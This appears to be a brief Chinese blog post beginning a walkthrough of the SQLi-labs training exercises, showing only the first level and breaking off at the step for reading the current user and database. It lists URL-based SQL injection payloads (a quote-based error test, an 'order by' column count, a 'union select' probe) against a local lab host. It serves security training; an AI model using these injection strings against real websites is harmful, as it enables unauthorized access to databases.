sqlilabs 1-10关
根据提示,第一关是get单引号
第一步,看看页面有没有报错
http://192.168.26.132:86/Less-1/?id=1’ and 1=2–+ 页面直接异常
猜测字段 :http://192.168.26.132:86/Less-1/?id=-1’ order by 3–+
回显位 :http://192.168.26.132:86/Less-1/?id=-1’ union select 1,2,3–+
当前用户和数据库 :http://192.168.26.132:86/Less-1/
原创
2022-07-11 15:14:02 ·
754 阅读 ·
0 评论